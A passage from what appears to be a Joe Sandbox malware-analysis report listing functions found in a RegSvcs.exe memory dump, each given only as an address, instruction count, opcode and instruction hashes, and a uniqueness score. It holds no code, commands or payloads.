                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6910d93ab4c894359061f5ebd500856bc24d412f5c420493f78657f3a6906c11
                                                                                                                              • Instruction ID: 7508a270ec573a85bc37e237fca9ff4c784ccdf1fe087ffdae3ce9b654679a10
                                                                                                                              • Opcode Fuzzy Hash: 6910d93ab4c894359061f5ebd500856bc24d412f5c420493f78657f3a6906c11
                                                                                                                              • Instruction Fuzzy Hash: 2611E772285A527BF7235655AC01F27B69DABE4B70F120429B708DF198DBB0DC018795
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E0946 Relevance: .1, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 59158eb68ecdfe686ba167021ce2ecfbfbf3404e4bbc8f808297c316a165c23c
                                                                                                                              • Instruction ID: 6a4d7f508cc3037af3b19ac0164ac9fbf41dccbd0e100adbb54013834fd9102e
                                                                                                                              • Opcode Fuzzy Hash: 59158eb68ecdfe686ba167021ce2ecfbfbf3404e4bbc8f808297c316a165c23c
                                                                                                                              • Instruction Fuzzy Hash: B82107B1E00309ABDB60CFAAD8959AEFBF8FF98710F11012FE415A7251D7709945CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                              • Instruction ID: 8d68c98a365095970b9e88c96f69b52304703c11f54289be70c4ea7f8f3315f8
                                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                              • Instruction Fuzzy Hash: E6216F72A0020AAFDB129F59CD40BAFBBB9EF54310F20441AFA40AB361D734D9519B50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01490124 Relevance: .1, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                              • Instruction ID: 05da2ff449b42a35074429f0d42554b4bfa92da7c43793dcdf4261099f8c81af
                                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                              • Instruction Fuzzy Hash: 6211E2B2600615AFDB229F45CC42F9ABFBCEFA0754F10042AF6008F2A0D672ED45CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01468770 Relevance: .1, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c87cb26b9e27ddc58a505f12ad7fdc504e5fe8bbf3d0968bccbdafc4b2e87dff
                                                                                                                              • Instruction ID: b0423307a9f1f1d10521d211ba38c9f60912bb080417200a3b55ae1a086a2316
                                                                                                                              • Opcode Fuzzy Hash: c87cb26b9e27ddc58a505f12ad7fdc504e5fe8bbf3d0968bccbdafc4b2e87dff
                                                                                                                              • Instruction Fuzzy Hash: B211B2357007129BDB11CF4EC880A17BBEDAF5A759B18406FEE08DF325D6B2D9028791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                              • Instruction ID: fe563f2baba822eb3f88db2727b62740362daed9af646e39a07ca2659e7d05b7
                                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                              • Instruction Fuzzy Hash: 49215E72640641DFDB35DF4AC540A66FBE6EB94B50F25887EE6499BB20C770EC01CB40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014680E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b7665953ab4b6fef6741c92e7cb5c1a95fff56bd8da1fb801d3c9429420c15ae
                                                                                                                              • Instruction ID: b23f1383e677f6e06390278bea4c668684ef59b4d5a27f4dda47a859b40bc8d5
                                                                                                                              • Opcode Fuzzy Hash: b7665953ab4b6fef6741c92e7cb5c1a95fff56bd8da1fb801d3c9429420c15ae
                                                                                                                              • Instruction Fuzzy Hash: F7216F75A0030ADFCB14CF58C591AAEBBB9FB88318F24416ED105AB325D771AD06CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149674D Relevance: .1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 56379fb6ed257e19a602825bf490bf1359be37b7c75293f19d60d4139c69ce9d
                                                                                                                              • Instruction ID: a789292ff8c8646375af2c088041009b2dbea1fd9b6df52cbd9fe6a5713be05e
                                                                                                                              • Opcode Fuzzy Hash: 56379fb6ed257e19a602825bf490bf1359be37b7c75293f19d60d4139c69ce9d
                                                                                                                              • Instruction Fuzzy Hash: 76216075601A01EFDB20CF69C881F66BBF8FF44250F45886EE59ACB660DA70A851CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F6870 Relevance: .1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3f3c1230c4fde342ef10747777adc9a9cb7d5329ab6edb5e3ddfb1cc132aacd8
                                                                                                                              • Instruction ID: 883bf8fe5f16b26335463176f674d1928460d50b399b592f438fa4ddebe79490
                                                                                                                              • Opcode Fuzzy Hash: 3f3c1230c4fde342ef10747777adc9a9cb7d5329ab6edb5e3ddfb1cc132aacd8
                                                                                                                              • Instruction Fuzzy Hash: 73119132240615FFD722DBAAC940F9A77A8EBA9760F12402EF305DB371DA70E901C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 197b4425a564061431b987487124d9fbda050c95615a497606ae055eb2684991
                                                                                                                              • Instruction ID: 9df4d3a856062a1a16b791d7d279cdc405682dc0e0fcf4793677e7cf719faf75
                                                                                                                              • Opcode Fuzzy Hash: 197b4425a564061431b987487124d9fbda050c95615a497606ae055eb2684991
                                                                                                                              • Instruction Fuzzy Hash: 101108773001149FCB19EB29CD95A6F72A7EBD5670B25492FD9229F3A0E9709802C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014966B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 509c607d162252a374bdf4847ef6a3a96e647a5d630ca8866c249ae8cb46b785
                                                                                                                              • Instruction ID: 0eb94c0773bf5e986e093c4ecdd75704e033507659da622f9879188663c33c04
                                                                                                                              • Opcode Fuzzy Hash: 509c607d162252a374bdf4847ef6a3a96e647a5d630ca8866c249ae8cb46b785
                                                                                                                              • Instruction Fuzzy Hash: 76118C76A01245DFCF25CF99D580E5ABFE8EB94650B0740BED9059B325E670DD01CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0152A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                              • Instruction ID: 8932fefb719225175af22102de8d8bf9efb2d3ee613a58185c652acdc921707b
                                                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                              • Instruction Fuzzy Hash: 4B110437A0092AAFDB19CB58CC05B9DBBF5FFC4210F058269E855AB380E771AD01CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01460AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                              • Instruction ID: 1c77c142180c5f34b2e2635f3f04afad697b51b7366eb0e2b95ed7f7df961ce8
                                                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                              • Instruction Fuzzy Hash: 7D2108B5A40B059FD3A0CF29C440B52BBF4FB58B10F10892EE98ACBB50E371E814CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                              • Instruction ID: cf308fb271850413fd99922ad81ff1a9b2bd217ea9ea45f86f305c8f66ff6f2a
                                                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                              • Instruction Fuzzy Hash: E111E331A00601EFE7209F49C848B577BE5FF51756F05882EE908AB270D771DC44C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014827ED Relevance: .1, Instructions: 58COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b7ec1e50959b75970c4b04eb303a5664d8c3b30be1ccb86cfde64645188b1977
                                                                                                                              • Instruction ID: 33788a97676dbf8edfa36b23fecb5ef4ca5e264c50dc67ea99d89addc225628e
                                                                                                                              • Opcode Fuzzy Hash: b7ec1e50959b75970c4b04eb303a5664d8c3b30be1ccb86cfde64645188b1977
                                                                                                                              • Instruction Fuzzy Hash: A6016675305249AFF312A22ED884F2B7B9CEF50794F15006BF9008B271EA74DC02C2A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01464690 Relevance: .1, Instructions: 57COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0ed85ca52511b7ef35c72c1ef1f454045296d8818f09071fa766598dd0e3db35
                                                                                                                              • Instruction ID: 2ad95eed38b39e5b8751f0d80656b0516c254963fbff6358d74392a76f0a447e
                                                                                                                              • Opcode Fuzzy Hash: 0ed85ca52511b7ef35c72c1ef1f454045296d8818f09071fa766598dd0e3db35
                                                                                                                              • Instruction Fuzzy Hash: 4411E076200641AFDF21CF99C880B577BACEB95B6AF08411BF9048B760C338E840CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01534B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 899873491b8dd5c703993618d872b277a291c82efffb23741f39d78fe0b5c464
                                                                                                                              • Instruction ID: bddfcfa934cd07dfbd26564be2a9d6b42b18abf874c41a2f38ac44de412bd46e
                                                                                                                              • Opcode Fuzzy Hash: 899873491b8dd5c703993618d872b277a291c82efffb23741f39d78fe0b5c464
                                                                                                                              • Instruction Fuzzy Hash: 1611E9362006119FDB26DA69D850F5BBBE5FFC4710F154419E692CB790DB34E802C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01496620 Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 39259af6ebe53da820296987c0a5b0001edf02f01e12b815ca9c4085f83c7bc4
                                                                                                                              • Instruction ID: 83f00d89a9e51aed701ef30753d4c0e52c095d05554f5ad0f0ba561b18fe4347
                                                                                                                              • Opcode Fuzzy Hash: 39259af6ebe53da820296987c0a5b0001edf02f01e12b815ca9c4085f83c7bc4
                                                                                                                              • Instruction Fuzzy Hash: A1118272A00715ABDB21DF6AC980B5EFFB8FF94750F52045ADA05AB320D730AD018B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dc2497d439290f106205f8c59f04af57e5cfb45493ac5ff6b16d9837507ec8a5
                                                                                                                              • Instruction ID: dd9f2b3f203f01c73bf18561a4fddf969fe6ac2f43dd32591d830a4f3cd0561f
                                                                                                                              • Opcode Fuzzy Hash: dc2497d439290f106205f8c59f04af57e5cfb45493ac5ff6b16d9837507ec8a5
                                                                                                                              • Instruction Fuzzy Hash: B301D2715102059FC325EB19D414F2ABBF9FB91718F25816FE1049B270E770EC46DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                              • Instruction ID: f723b973a9be5da7bdb51a4e200774448ddd445828c01930f42c5ed026e4d67c
                                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                              • Instruction Fuzzy Hash: AD11E5752016C29BEB23AB6CC954BAA7B95EB01B44F1900ABDE4197772F33CC847D261
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                              • Instruction ID: c425d892e8401449def7d6444e14cd54014cbdad2e53862e0d233111c9db69fe
                                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                              • Instruction Fuzzy Hash: 85012232240105AFE7219F5ACC08F5B7AE9EF55752F09846BEA04AB270E771DD40C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                              • Instruction ID: c08a5e338554998b078c6ff8ca11736cb7dd685766a86dea2c9697851aeb9ae6
                                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                              • Instruction Fuzzy Hash: B1012631404722AFCB718F19E841A337BA8EF557A07108A2EFC958B3A2C331D401CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01534940 Relevance: .1, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 311094f3f12f73bf660af17b579a28d0a8e158c405c710bbdda4459450ae577d
                                                                                                                              • Instruction ID: a03e9e2f1941688c7200cac313d63b49317eb2fe6d84cd2c37b05047acabf946
                                                                                                                              • Opcode Fuzzy Hash: 311094f3f12f73bf660af17b579a28d0a8e158c405c710bbdda4459450ae577d
                                                                                                                              • Instruction Fuzzy Hash: E801D2735416119FC332DF1DD840E56BBA8FBD1770B254269E9A99F1A6E730D801CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0432b8474ab0d8df6b2136fd550322c5c16a3f76ed08ebcacb485ab7c13a1112
                                                                                                                              • Instruction ID: 8940e23061a3b5fb1dda96847c5563646f6c419685795e1f8fc7f83b9c6b1046
                                                                                                                              • Opcode Fuzzy Hash: 0432b8474ab0d8df6b2136fd550322c5c16a3f76ed08ebcacb485ab7c13a1112
                                                                                                                              • Instruction Fuzzy Hash: 2C11A136241241EFDB15EF1ACDA0F567BB8FF64B44F1000AAE9059F661C235ED01CA90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01466259 Relevance: .1, Instructions: 51COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 428bff690a0527d6fadc0f6ca3fd99ad43e84d901def88485c314abf4065f990
                                                                                                                              • Instruction ID: 254e4735d30e2544458b8faf6c8ee06a271979c41c5bcd4f49b700b84486686e
                                                                                                                              • Opcode Fuzzy Hash: 428bff690a0527d6fadc0f6ca3fd99ad43e84d901def88485c314abf4065f990
                                                                                                                              • Instruction Fuzzy Hash: CB119E70541218ABDB25AF25CC41FE9B278AB24710F9141DAA314A61F0D6709E81DF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1debc8343f622c82b8b7749b58ca8fc0b4c13550de0f1013754267c021e95a14
                                                                                                                              • Instruction ID: 17c19346508428f0c97025dd47fb0b99ca7c77484001192df686a6d3c993d359
                                                                                                                              • Opcode Fuzzy Hash: 1debc8343f622c82b8b7749b58ca8fc0b4c13550de0f1013754267c021e95a14
                                                                                                                              • Instruction Fuzzy Hash: 41112D73900119ABCB11DB95CC84DDFBBBCEF58254F054166E906E7211EA34EA15CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146208A Relevance: .0, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction ID: 44b40156d417dfbacdf3b7a980be05de48ca72317df1a5e0f61738d1c7b7a49d
                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction Fuzzy Hash: BC01F572600101ABEF119E5DD880E93776ABFD4704F1544ABEE058F366DAB1C881C3A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
